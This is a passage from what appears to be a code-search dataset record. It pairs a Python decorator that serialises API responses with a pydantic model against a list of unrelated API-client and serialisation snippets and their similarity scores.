NotImplementedError", "def __call__(self, method, url, *args, **kwargs):\n log.debug('{} {}'.format(method.upper(), url))\n if 'params' in kwargs:\n kwargs['query'] = kwargs.pop('params')\n return getattr(self.client, method)(url, *args, **kwargs).json", "def GetModel(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def convert_api_to_usr_model(self):\n\n usr_model = dict()\n self._copy_api_entry('ApplicationName', usr_model)\n self._copy_api_entry('DateUpdated', usr_model)\n if 'ResourceLifecycleConfig' in self.api_model:\n usr_model['Configurations'] = self.api_model['ResourceLifecycleConfig']\n else:\n usr_model['Configurations'] = DEFAULT_LIFECYCLE_CONFIG\n\n if 'ServiceRole' not in usr_model['Configurations']:\n try:\n role = get_role(DEFAULT_LIFECYCLE_SERVICE_ROLE)\n if u'Arn' in role:\n arn = role[u'Arn']\n else:\n arn = DEFAULT_ARN_STRING\n except (NotFoundError, ServiceError):\n arn = DEFAULT_ARN_STRING\n\n usr_model['Configurations']['ServiceRole'] = arn\n\n return usr_model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def from_python_function(instance):\n # set the pagination class\n pagination_class = FromPythonPagination\n # filter queryset based on the search terms\n instance.queryset = instance.filter_queryset(instance.queryset)\n # get the serializer for this view\n current_serializer = general_serializer(instance)\n # serialize the data (many flag for serializing a queryset)\n serialized_queryset = current_serializer(instance.queryset, many=True, context={'request': instance.request})\n # get the data to serialize\n data = serialized_queryset.data\n # generate the response\n return HttpResponse(JSONRenderer().render({'count': len(instance.queryset), 'next': None, 'previous': None,\n 'results': data}))", "def bind_request(**request_data):\n\n class Request(Api):\n \"\"\"Request class. Does the actual API request.\"\"\"\n\n model = request_data.get(constants.ClientConst.MODEL)\n api_path = request_data.get(constants.RequestConst.API_PATH)\n formatter = request_data.get(constants.ClientConst.FORMATTER)\n method = request_data.get(\n constants.RequestConst.METHOD, constants.RequestConst.GET\n )\n query_parameters = request_data.get(\n constants.RequestConst.QUERY_PARAMETERS\n )\n fake_response_path = request_data.get(\n constants.TestConst.FAKE_RESPONSE_PATH\n )\n default_parameters = request_data.get(\n constants.RequestConst.DEFAULT_PARAMETERS, {}\n )\n # immediately determine type of response\n single_model_response = request_data.get(\n constants.ClientConst.FORCE_SINGLE_MODEL_RESPONSE, False\n ) or method in [\n constants.RequestConst.POST,\n constants.RequestConst.PUT,\n constants.RequestConst.DELETE\n ]\n\n def __init__(self, client, debug: 'Debug',\n *path_params, **query_params):\n client.request = self\n\n self.url = None\n self.debug = debug\n self.client = client\n self.parameters = {\n constants.RequestConst.QUERY: {},\n constants.RequestConst.PATH: []\n }\n\n self._timeout = 5\n\n self._set_parameters(*path_params, **query_params)\n\n def _set_parameters(self, *path_params, **query_params):\n \"\"\"\n Prepares the list of query parameters\n :path_params: list of path parameters\n :query_params: dict of query parameters\n :return: None\n \"\"\"\n\n # take timeout\n try:\n self._timeout = int(query_params.get(\n constants.RequestConst.TIMEOUT, self._timeout\n ))\n except ValueError:\n pass\n try:\n del query_params[constants.RequestConst.TIMEOUT]\n except KeyError:\n pass\n\n # set default API call params\n for key, value in self.default_parameters.items():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n _query_params = self.query_parameters.get_params()\n\n # set API call params defined during the \"call\" invocation\n for key, value in query_params.items():\n if value is None:\n continue\n\n if key in _query_params.values():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n elif key in _query_params.keys():\n self.parameters[\n constants.RequestConst.QUERY\n ][_query_params[key]] = value\n\n if self.method == constants.RequestConst.GET:\n # transform all True and False param to 1 and 0\n for key, value in self.parameters[\n constants.RequestConst.QUERY\n ].items():\n if value is True:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.TRUE\n if value is False:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.FALSE\n\n # set optional url path params\n for value in path_params:\n self.parameters[constants.RequestConst.PATH].append(value)\n\n def _prepare_url(self):\n \"\"\"\n Prepares url and query parameters for the request\n :return: URL\n \"\"\"\n\n base_url = '{}://{}{}'.format(\n self.client.protocol, self.client.base_url, self.api_path\n )\n url_parts = '/'.join(\n [part for part in self.parameters[constants.RequestConst.PATH]]\n )\n\n if url_parts:\n final_url = '{}/{}'.format(base_url, url_parts)\n else:\n final_url = base_url\n\n if self.method == constants.RequestConst.GET:\n params = self.parameters[constants.RequestConst.QUERY]\n for param, value in params.items():\n if isinstance(value, list):\n params[param] = ','.join(value)\n elif isinstance(value, dict):\n params[param] = ','.join([f'{k}:{v}' for k, v in value])\n\n url_query = '?' + '&'.join([f'{k}={v}' for k, v in params.items()])\n final_url = '{}{}'.format(final_url, url_query)\n\n self.debug.ok('final url', final_url)\n\n return final_url\n\n def _headers(self):\n \"\"\"Construct headers data with authentication part\"\"\"\n\n auth_token = SendbeeAuth(self.client.api_secret).get_auth_token()\n headers = {\n 'X-Auth-Token': auth_token,\n 'X-Api-Key': self.client.api_key,\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n 'User-Agent': 'Sendbee Python API Client'\n }\n self.debug.ok('headers', headers)\n\n return headers\n\n def _do_request(self, url: str):\n \"\"\"\n Makes the request to Sendbee Api servers\n :url: Url for the request\n :return: Tuple with two elements, status code and content\n \"\"\"\n\n self.debug.ok('method', self.method)\n\n if self.client.fake_response_path:\n with open(self.client.fake_response_path, 'r') as f:\n return constants.ResponseCode.OK, f.read()\n\n elif self.method == constants.RequestConst.GET:\n response = requests.get(\n url, headers=self._headers(), timeout=self._timeout\n )\n\n self.debug.ok(\n constants.RequestConst.QUERY_PARAMETERS,\n self.parameters[constants.RequestConst.QUERY]\n )\n self.debug.ok(constants.ResponseConst.RESPONSE_OBJECT, response)\n\n return response.status_code, response.text\n\n elif self.method in [\n constants.RequestConst.POST,\n constants.RequestConst.PUT,\n constants.RequestConst.DELETE\n ]:\n if self.method == constants.RequestConst.POST:\n send_request = requests.post\n elif self.method == constants.RequestConst.PUT:\n send_request = requests.put\n elif self.method == constants.RequestConst.DELETE:\n send_request = requests.delete\n\n response = send_request(\n url, json=self.parameters[constants.RequestConst.QUERY],\n headers=self._headers(), timeout=self._timeout\n )\n\n self.debug.ok('payload', self.parameters[\n constants.RequestConst.QUERY\n ])\n self.debug.ok(constants.ResponseConst.RESPONSE_OBJECT, response)\n\n return response.status_code, response.text\n\n else:\n return constants.ResponseCode.NOT_FOUND, {}\n\n def _process_response(self, status_code, response):\n \"\"\"\n Process response using models\n :status_code: Response status code\n :response: Content\n :return: Response object\n \"\"\"\n\n formatter = self.formatter\n if not formatter:\n formatter = FormatterFactory(constants.FormatterConst.JSON)\\\n .get_formatter()\n\n response = Response(response, status_code, formatter, self)\n formatted_data = response.formatted_data\n\n if status_code >= constants.ResponseCode.BAD_REQUEST:\n\n if status_code == constants.ResponseCode.NOT_FOUND:\n error_msg = \\\n constants.ErrorConst.NOT_FOUND\n elif constants.ErrorConst.ERROR not in formatted_data:\n error_msg = \\\n constants.ResponseConst.DEFAULT_ERROR_MESSAGE\n else:\n error_msg = formatted_data.get(\n constants.ErrorConst.ERROR, {}\n ).get(\n constants.ErrorConst.DETAIL,\n constants.ErrorConst.UNRECOGNIZED_ERROR\n )\n\n self.debug.error(\n constants.ResponseConst.STATUS_CODE, status_code\n )\n self.debug.error(\n constants.ResponseConst.RESPONSE, response.formatted_data\n )\n raise SendbeeRequestApiException(error_msg)\n else:\n self.debug.ok(constants.ResponseConst.STATUS_CODE, status_code)\n self.debug.ok(constants.ResponseConst.RESPONSE, response.raw_data)\n\n if response.meta.current_page:\n if response.meta.current_page > 1 and len(response.models) == 0:\n raise PaginationException(\n f'Page {response.meta.current_page} has no data'\n )\n\n if response.warning:\n click.secho(\n constants.WarningConst.MESSAGE + response.warning,\n fg='yellow'\n )\n\n if self.single_model_response:\n if response.models:\n return response.models[0]\n else:\n return None\n else:\n return response\n\n def call(self):\n \"\"\"\n Makes the API call\n :return: Return value from self._process_response()\n \"\"\"\n\n self.url = self._prepare_url()\n status_code, response = self._do_request(self.url)\n return self._process_response(status_code, response)\n\n def call(client, *path_params, **query_params):\n \"\"\"\n Binded method for API calls\n :path_params: list of path parameters\n :query_params: dict of query parameters\n :return: Return value from Request.call()\n \"\"\"\n\n if constants.MiscConst.PRINT_PARAMS in query_params:\n Request.query_parameters.print_params()\n return\n\n with Debug(client=client) as debug:\n request = Request(client, debug, *path_params, **query_params)\n return request.call()\n\n call.__doc__ = request_data.get(constants.ClientConst.DESCRIPTION)\n\n return call", "def _set_attributes(self, model):\n\n if model:\n self._get_dict(model)", "def train_model(self, *args, **kwargs):\n raise NotImplementedError", "def requests_response_to_model(response_transformer):\n def response_transform_decorator(original_func):\n \"\"\"\n Creates wrapper around a function that returns response\n \"\"\"\n def response_transformer_wrapper(*args, **kwargs):\n \"\"\"\n Log errors and apply transformation in response_handler_func\n \"\"\"\n try:\n response = original_func(*args, **kwargs)\n response.raise_for_status()\n\n except requests.exceptions.HTTPError:\n help_string = ('Please consult the Coursera Data '\n 'Exports Guide for further assistance: '\n 'https://partner.coursera.help/hc/en-us/articles/360021121132.') # noqa\n\n if (response.status_code == 403):\n help_string = ('Please authorize this application '\n 'by running:\\n'\n '\\t$ courseraoauth2client config authorize --app manage_research_exports\\n' # noqa\n 'See https://github.com/coursera/courseraoauth2client ' # noqa\n 'for more information on authorization.\\n'\n 'For further assistance, consult the '\n 'Coursera Data Exports Guide '\n 'https://partner.coursera.help/hc/en-us/articles/360021121132.') # noqa\n\n logging.error(\n 'Request to {url} with body:\\n\\t{body}\\nreceived response'\n ':\\n\\t{text}\\n'\n '{help_string}\\n'\n .format(url=response.url,\n text=response.text,\n body=(response.request and response.request.body),\n help_string=help_string))\n raise\n\n return response_transformer(response)\n return response_transformer_wrapper\n return response_transform_decorator", "def handle_model_request(model_name):\n if model_name in app.models:\n return (\n json.dumps(app.models[model_name][\"data\"]), 200,\n {'ContentType': 'application/json'}\n )\n else:\n return _respond_not_found()", "def deserialize_model(data, klass):\n instance = klass()\n\n if not instance.swagger_types:\n return data\n\n for attr, attr_type in iteritems(instance.swagger_types):\n if data is not None \\\n and instance.attribute_map[attr] in data \\\n and isinstance(data, (list, dict)):\n value = data[instance.attribute_map[attr]]\n setattr(instance, attr, _deserialize(value, attr_type))\n\n return instance", "def prepare_request_params(\n request_params: Dict, model_id: Text, model_data: Dict\n) -> Dict:\n request_params = correct_types(request_params, model_data[\"columns_data\"])\n if model_data[\"hashed_indexes\"]:\n request_params = reverse_hash_names(model_id, request_params)\n return request_params", "def to_payload(self, model):\n if self.skip:\n raise SkipField\n payload = dict(map_zip_model_fields(model, self.attrgetter))\n if model.remote_instance:\n zipped_remote_instance = map_zip_model_fields(\n model.remote_instance, self.remote_instance_attrgetter\n )\n payload.update(zipped_remote_instance)\n\n for field, mapping in model.fields.items():\n self.serialize_field(payload, model, field, mapping)\n payload['local_id'] = model.id\n return payload", "def instance_for_model(self, model: AbstractPriorModel):\n try:\n if self.is_path_kwargs:\n return model.instance_from_path_arguments(self.kwargs)\n else:\n return model.instance_from_prior_name_arguments(self.kwargs)\n\n except KeyError:\n # TODO: Does this get used? If so, why?\n return model.instance_from_vector(self.parameter_lists_for_model(model))", "def lock_model():\n def decorate(cls):\n def decorator(fn):\n @wraps(fn)\n def inner(*args, **kwargs):\n # This is a class decorator and its targets are methods, so\n # the first argument will be ``self``.\n self = args[0]\n model = self.request.validated.get('model', None)\n method_name = '%s.%s' % (self.__class__.__name__, fn.__name__)\n\n # Lock the model before entering the method body.\n if model:\n model.lock.acquire()\n log.info('Model locked by %s' % method_name)\n\n try:\n result = fn(*args, **kwargs)\n except:\n # Release the lock if an exception occurs and propagate\n # the exception up the stack.\n if model:\n model.lock.release()\n log.exception('Model unlocked after view exception '\n 'by %s' % method_name)\n raise\n\n # Release the lock after the method completes.\n if model:\n model.lock.release()\n log.info('Model unlocked by %s' % method_name)\n\n return result\n return inner\n\n targets = ['get', 'put', 'post', 'delete']\n for method in [attr for attr in cls.__dict__\n if attr in targets and callable(getattr(cls, attr))]:\n setattr(cls, method, decorator(getattr(cls, method)))\n\n return cls\n return decorate" ]
[ "0.6261429", "0.61969465", "0.5975331", "0.56145257", "0.5604642", "0.55971265", "0.558913", "0.5562619", "0.54409605", "0.5427529", "0.5384895", "0.53138745", "0.531021", "0.5299018", "0.52693087", "0.52421254", "0.5187899", "0.5182848", "0.51826674", "0.5159831", "0.5159831", "0.5132555", "0.51257706", "0.51168", "0.5110996", "0.5110925", "0.5107068", "0.5103126", "0.5091716", "0.5048244", "0.5033175", "0.50312096", "0.50292754", "0.50264955", "0.5012763", "0.5008977", "0.49970418", "0.4992126", "0.49610615", "0.49523407", "0.49501094", "0.49346828", "0.4904013", "0.48733094", "0.48708904", "0.48708394", "0.4857201", "0.48379785", "0.48371997", "0.48354936", "0.48328754", "0.48277834", "0.4820644", "0.48162234", "0.48080027", "0.4805414", "0.47922263", "0.47865775", "0.47852632", "0.47851872", "0.47815546", "0.47809896", "0.4777303", "0.47752586", "0.4768624", "0.47580582", "0.4757899", "0.4757329", "0.47496775", "0.47445446", "0.47354397", "0.47329253", "0.47254753", "0.47252694", "0.47247794", "0.47241142", "0.4722958", "0.4722006", "0.4721456", "0.47187555", "0.47036093", "0.47021738", "0.4691032", "0.4689762", "0.46874171", "0.46859795", "0.46859795", "0.46859795", "0.46859795", "0.4683353", "0.46761313", "0.467539", "0.466834", "0.46577623", "0.4648633", "0.4647231", "0.46471933", "0.46432763", "0.46369275", "0.46306255" ]
0.7151013
0
Decorator to be used in apimethods to convert the responsedata of the decorated apimethod to a json based on the passed `model`.
def api_outputmodel(api: str, model: BaseModel, servicename: str, service_logger: logger) -> Callable: def decorator(func): @wraps(func) async def function_wrapper(request, *args, **kwargs): service_result = await func(request, *args, **kwargs) try: if isinstance(service_result, model): result = service_result else: result = model(**service_result) output = response.json(result.dict()) except Exception as err: msg = ('an internal error occured (service: ' f'{servicename}, api: {api}): {err}') raise ServerError(msg) service_logger.info(f'processed result {result} => ' f'{output.content_type} [{output.status}] ' f'{output.body}') return output return function_wrapper return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def json_response(func):\n\t@wraps(func)\n\tdef decorated_view(*args, **kwargs):\n\t\tdata = func(*args, **kwargs)\n\t\tdata = json.dumps(data)\n\t\tresponse = make_response(data)\n\t\tresponse.headers['Content-Type'] = 'application/json'\n\t\treturn response\n\treturn decorated_view", "def json_response(func):\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n try:\n data = simplejson.dumps(objects)\n if 'callback' in request.GET:\n data = '%s(%s);' % (request.GET['callback'], data)\n except:\n data = simplejson.dumps(str(objects))\n if 'just_the_json_plz' in kwargs:\n return data\n if 'just_the_data_plz' in kwargs:\n return objects\n if 'callback' in request.GET or 'callback' in request.POST:\n #jsonp\n return HttpResponse(data, \"text/javascript\")\n else:\n #json\n return HttpResponse(data, \"application/json\")\n return decorator", "def as_json(func):\n @functools.wraps(func)\n def inner(*args, **kwargs):\n json_response = _as_json(func(*args, **kwargs))\n if isinstance(json_response, tuple):\n response, code = json_response\n if isinstance(response, GenericYetiError):\n return jsonify({response.type: response.message}), code\n return jsonify(response), code\n return jsonify(json_response)\n return inner", "def from_model(model):\n ret = model2json(model)\n return JsonBody(ret['body'])", "def json_response(func):\n def wrapper(*args, **kwargs):\n try:\n ret_val = func(*args, **kwargs)\n if isinstance(ret_val, dict):\n result = {\"code\": 0, \"msg\": \"\", \"data\": ret_val}\n return JsonResponse(result)\n else:\n result = {\"code\": -20002, \"msg\": u\"视图函数返回值类型必须是字典\"}\n return JsonResponse(result)\n\n except Exception as err:\n logger.exception(\"func name: %s, error: %s\" % (func.__name__, err))\n result = {\"code\": -20001, \"msg\": str(err)}\n return JsonResponse(result)\n return wrapper", "def handle_model_request(model_name):\n if model_name in app.models:\n return (\n json.dumps(app.models[model_name][\"data\"]), 200,\n {'ContentType': 'application/json'}\n )\n else:\n return _respond_not_found()", "def response_json(func):\n\n @wraps(func)\n def set_response(*args, **kwargs):\n res = func(*args, **kwargs)\n if type(res) is not dict:\n return res\n else:\n return Response(json.dumps(res), content_type=\"application/json; charset=utf-8\")\n return set_response", "def jsonify(function):\n @wraps(function)\n def inner(*args, **kwargs):\n \"\"\"\n This docstring will be overridden by @wraps decorator.\n \"\"\"\n return Response(\n dumps(function(*args, **kwargs)),\n mimetype='application/json'\n )\n return inner", "def jsonify(func):\n\n @functools.wraps(func)\n def convert(*args, **kwargs):\n\n success = True\n code = 200 # default status code - success!\n\n try:\n result = func(*args, **kwargs)\n\n if isinstance(result, BaseResponse):\n return result\n\n except exc.HTTPException as ex:\n # i'd like to be able to just re-raise e here, but the body of the\n # response is e.get_body() instead of e.description - so we have to\n # just set up the response ourselves\n result = { 'message' : ex.description }\n code = ex.code\n\n except Exception as ex:\n result = { 'message' : 'Internal Server Error', 'system_message' : ex.message }\n code = 500\n\n # build a response object, and change the content type header to json\n response = make_response(json.dumps(result))\n response.headers['Content-Type'] = 'application/json'\n response.status_code = code\n\n return response\n\n # return the function that is taking the place of (or masquerading as) our decorated function\n return convert", "def create_json_from_model(self):\n json = {\n \"enableAutoReply\": self.enable_auto_reply,\n \"responseSubject\": self.response_subject,\n \"responseBodyPlainText\": self.response_body_plain_text,\n \"responseBodyHtml\": self.response_body_html,\n \"restrictToContacts\": self.restrict_to_contacts,\n \"restrictToDomain\": self.restrict_to_domain,\n \"startTime\": self.start_time,\n \"endTime\": self.end_time\n }\n return json", "def json_response(func):\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n try:\n data = json.dumps(objects, default=json_serialize)\n if 'callback' in request.REQUEST:\n # a jsonp response!\n data = '%s(%s);' % (request.REQUEST['callback'], data)\n return HttpResponse(data, \"text/javascript\")\n except Exception as e:\n print (e)\n data = json.dumps(str(objects))\n return HttpResponse(data, \"application/json\")\n return decorator", "def json_friendly(self):", "def json_response(func):\n\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n try:\n data = simplejson.dumps(objects)\n if 'callback' in request.REQUEST:\n # a jsonp response!\n data = '%s(%s);' % (request.REQUEST['callback'], data)\n return HttpResponse(data, \"text/javascript\")\n except:\n data = simplejson.dumps(str(objects))\n return HttpResponse(data, \"application/json\")\n\n return decorator", "def json_response(func):\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n try:\n data = simplejson.dumps(objects)\n if 'callback' in request.REQUEST:\n # a jsonp response!\n data = '%s(%s);' % (request.REQUEST['callback'], data)\n return HttpResponse(data, \"text/javascript\")\n except:\n data = simplejson.dumps(str(objects))\n return HttpResponse(data, \"application/json\")\n return decorator", "def json_decorator(f):\n def decorator(*args, **kwargs):\n return jsonify(f(*args, **kwargs))\n return decorator", "def jsonify(obj):\n raise NotImplementedError", "def json_response(func):\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n\n data = json.dumps(objects)\n if 'callback' in request:\n # a jsonp response!\n data = '%s(%s);' % (request['callback'], data)\n return HttpResponse(data, \"text/javascript\")\n\n return HttpResponse(data, \"application/json\")\n return decorator", "def jsonify(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n result = f(*args, **kwargs)\n data = json.dumps(result, indent=None if request.is_xhr else 2)\n return app.response_class(data, mimetype='application/json')\n return decorated_function", "def jsonify(func, *args, **kwargs): \n adict = func(*args, **kwargs)\n if not isinstance(adict, dict):\n return adict\n \n \n #: getting updates from session and database\n \n updates = list(session['callback_updates']) \n updates.extend(models.CallbackUpdate.dump())\n \n if updates:\n if not adict.get('type') == 'composite':\n adict = beans._wrap('composite', [adict]) \n \n adict['result'].extend(updates)\n \n json = simplejson.dumps(adict)\n response = make_response(json) \n response.headers['Content-Type'] = 'application/json'\n session['callback_updates'] = []\n db.session.commit() \n return response", "def response_json(func):\n def wrapper(request):\n try:\n return get_json_response(func(request))\n except Exception as ex:\n return get_json_response({\n \"status\": \"error\",\n \"error_info\": str(ex),\n \"trace_back\": traceback.format_exc()\n })\n\n return wrapper", "def json(data, *args, **kwargs):\n return HttpResponseBehaviour(JsonResponse, data, *args, **kwargs)", "def json_service(f):\n\n @wraps(f)\n def decorated_function(*args, **kwargs):\n try:\n results = f(*args, **kwargs)\n if results is None:\n results = {}\n if not isinstance(results, dict):\n results = {'data': results}\n if 'success' not in results:\n results['success'] = True\n return jsonify(results)\n except Exception as e:\n print \"error in: \", f.__name__\n print traceback.print_exc()\n return jsonify({'success': False, 'error': str(e)})\n\n return decorated_function", "def get_json_response(obj):\n return HttpResponse(json.dumps(obj))", "def get_json_response(obj):\n return HttpResponse(json.dumps(obj))", "def model_to_json(model: Base) -> Dict[str, Any]:\n json = {}\n for col in model.__mapper__.attrs.keys(): # type: ignore\n if col != \"hashed_password\" and col != \"salt\":\n if col in datetime_cols:\n # Cast datetime object to string\n json[col] = str(getattr(model, col))\n else:\n json[col] = getattr(model, col)\n return json", "def model_json(request, method, object_id):\n model_object = ImageSelector.objects.filter(id=object_id)\n methods = ['get_prev_front_sibling', 'get_next_front_sibling', 'get_next_cutted_siblings',\n 'get_prev_cutted_siblings', 'get_next_cutted_front_siblings',\n 'get_prev_cutted_front_siblings']\n if len(model_object) == 0 or method not in methods:\n response_dic = {'object': 'not found!'}\n else:\n model_object = model_object[0]\n if method == 'get_prev_front_sibling':\n response_data = [model_object.get_prev_front_sibling()]\n elif method == 'get_next_front_sibling':\n response_data = [model_object.get_next_front_sibling()]\n elif method == 'get_next_cutted_siblings':\n response_data = model_object.get_next_cutted_siblings()\n elif method == 'get_prev_cutted_siblings':\n response_data = model_object.get_prev_cutted_siblings()\n elif method == 'get_next_cutted_front_siblings':\n response_data = model_object.get_next_cutted_front_siblings()\n elif method == 'get_prev_cutted_front_siblings':\n response_data = model_object.get_prev_cutted_front_siblings()\n\n response_dic = []\n if response_data:\n for response in response_data:\n if response.main_image:\n image_id = response.main_image.id\n response_dic.append({'page_id': response.id, 'image_id': image_id})\n\n response_data = json.dumps(response_dic)\n # return an HttpResponse with the JSON and the correct MIME type\n return HttpResponse(response_data, content_type='application/json')", "def __json_call(self, method, data):\n headers = self.headers\n headers['Content-type'] = 'application/json'\n data = json.dumps(data)\n return self.__call(headers, method, data)", "def handle_models_request():\n # TODO: add sort and filter by creation/modification date\n return (\n json.dumps({\"models\": {\n k: d[\"data\"] for k, d in app.models.items()\n }}), 200,\n {'ContentType': 'application/json'}\n )", "def wrap_response(f):\n @wraps(f)\n def wrapped_f(*args, **kwargs):\n resp = f(*args, **kwargs)\n if isinstance(resp, Response):\n return resp\n elif isinstance(resp, list):\n return jsonify({'data': resp})\n elif hasattr(resp,'to_json'):\n return jsonify(resp.to_json())\n else:\n return jsonify(resp)\n return wrapped_f", "def json_response(obj):\n return HttpResponse(json.dumps(obj), content_type=\"application/json\")", "def response_json(func):\n\n def wrapper(req):\n try:\n\n return get_json_response(func(req))\n except Exception as ex:\n return get_json_response({\n \"status\": \"error\",\n \"error_info\": str(ex),\n \"trace_back\": traceback.format_exc()\n })\n\n return wrapper", "def api_inputmodel(api: str, model: BaseModel, servicename: str,\n service_logger: logger) -> Callable:\n\n def decorator(func):\n @wraps(func)\n async def function_wrapper(request, *args, **kwargs):\n try:\n service_params = model.parse_raw(request.body)\n except ValidationError as err:\n msg = (f'API: {api} - invalid params ({request.json}) passed '\n f'to {servicename}: {err}')\n service_logger.warning(msg)\n raise PreconditionFailed(msg, status_code=412)\n result = await func(request=request,\n service_params=service_params,\n service_logger=service_logger,\n *args,\n **kwargs)\n return result\n\n return function_wrapper\n\n return decorator", "def _json_default_encoder(func):\n\n @wraps(func)\n def inner(self, o):\n try:\n return o._redpipe_struct_as_dict # noqa\n except AttributeError:\n pass\n return func(self, o)\n\n return inner", "def response(schema):\n def _response(function):\n @wraps(function)\n def wrapper(*args, **kwargs):\n if issubclass(schema, BaseModel):\n has_root = True if '__root__' in schema.__fields__ else False\n function_res = function(*args, **kwargs)\n\n if not function_res:\n if has_root is True:\n return jsonify([])\n return jsonify({})\n\n if type(function_res) == list:\n res = schema.parse_obj(function_res)\n else:\n res = schema.from_orm(function_res)\n\n res = res.dict()\n\n if has_root is True:\n return jsonify(res['__root__'])\n\n return jsonify(res)\n elif isinstance(schema, dict):\n return jsonify(schema)\n else:\n raise CustomException('invalid response type', code=400)\n\n return wrapper\n return _response", "def _create_response_model(self, data):\n pass", "def as_json(self):", "def json(f):\n if dsettings.DEBUG:\n ct = 'text/plain'\n j = lambda d: simplejson.dumps(d, indent = 2)\n else:\n ct = 'application/json'\n j = simplejson.dumps\n def wrapper(func, *args, **kw):\n try:\n result = func(*args, **kw)\n except Exception, e:\n result = j(str(e))\n status = 500\n else:\n if isinstance(result, http.HttpResponse):\n return result\n else:\n result = j(result)\n status = 200\n return http.HttpResponse(content = result, content_type = ct, status = status)\n return decorator(wrapper, f)", "def J(*args, **kwargs):\n response = jsonify(*args, **kwargs)\n response.mimetype = 'application/vnd.api+json'\n return response", "def dispatch(self, request, *args, **kwargs):\n # Wrap the dispatch method, so that we autoencode JSON\n response = super(JSONRestView, self).dispatch(request, *args, **kwargs)\n # If this is not an HTTPResponseBase object (Base class for responses) \n if not isinstance(response, HttpResponseBase):\n response = json_response(response)\n\n return response", "def decorator(func):\n def wrapper(resource, request, ** kwargs):\n \"\"\" wraps the method with common api response's routines, like\n checking if it's authenticated or packing the response in an api\n friendly way\n\n \"\"\"\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)\n return wrapper", "def to_payload(self, model):\n return model", "def paginated_search_json_response(func):\n @json_response\n @paginated_search_for_json_response\n @paginator\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n return objects\n return decorator", "def opt_model_create_rest_api():\n request_json = request.get_json()\n OptimModelRequestAPI(request_json).validate()\n return create_model_data(request_json)", "def json_response(*args, **kwargs):\n data = stringify(*args, **kwargs)\n return Response(data, mimetype='application/json')", "def paginated_json_response(func):\n @json_response\n @paginated_for_json_response\n @paginator\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n return objects\n return decorator", "def render_json(object):\r\n return HttpResponse(jsonify(object), content_type='application/json')", "def default(self, value: typing.Any) -> typing.Any:\n if isinstance(value, ToJson):\n return value.to_response_data()", "def inner(*args, **kwargs):\n return Response(\n dumps(function(*args, **kwargs)),\n mimetype='application/json'\n )", "def model_json(name):\n model = Model.query.filter_by(name=name).first_or_404()\n return jsonify(**model.meta)", "def paginated_search_for_json_response(func):\n def decorator(request, *args, **kwargs):\n page = func(request, *args, **kwargs)\n data = {}\n data['total_number'] = page.paginator.count\n data['page_number'] = page.number\n data['total_pages'] = page.paginator.num_pages\n data['next'] = page.has_next()\n data['previous'] = page.has_previous()\n try:\n data['objects'] = [(a.object.to_json_dict(request)) for a in page.object_list]\n except Exception, args:\n\n try:\n data['objects'] = [(a.object.to_json_dict()) for a in page.object_list]\n except Exception, args:\n data['objects'] = serializers.serialize(\"python\", [a.object for a in page.object_list])\n return data\n return decorator", "def jsonify(obj):\n d = model_to_dict(obj)\n return json.dumps(d, cls=LazyEncoder)", "def json_response(data):\n return current_app.response_class(\n json.dumps(data),\n mimetype=\"application/json\"\n )", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(self.get_data(context))", "def decorated_function(request, *args, **kwargs):\n user_for_login(request)\n response['data'] = f(*args, **kwargs)\n response = json.dumps(response)\n return response", "def paginated_for_json_response(func):\n def decorator(request, *args, **kwargs):\n page = func(request, *args, **kwargs)\n data = {}\n data['total_number'] = page.paginator.count\n data['page_number'] = page.number\n data['total_pages'] = page.paginator.num_pages\n data['next'] = page.has_next()\n data['previous'] = page.has_previous()\n objects = []\n for o in page.object_list:\n if hasattr(o, 'to_json_dict'):\n try:\n objects.append(o.to_json_dict())\n except Exception, args:\n pass\n else:\n try:\n objects.append(o)\n except Exception, args:\n pass\n if not objects:\n objects = serializers.serialize(\"python\", [o for o in page.object_list])\n data['objects'] = objects\n return data\n return decorator", "def wrapper(*args, **kwargs):\n response = {\n \"meta\": {\n \"status\": kwargs.pop(\"status\", True),\n \"verbose\": kwargs.pop(\"verbose\", \"OK\")\n },\n \"content\": None\n }\n if not response[\"meta\"][\"status\"]:\n cherrypy.response.headers['Content-Type'] = 'application/json'\n cherrypy.response.status = 400\n return json.dumps(response)\n return method(*args, **kwargs)", "def get_data(self):\n return 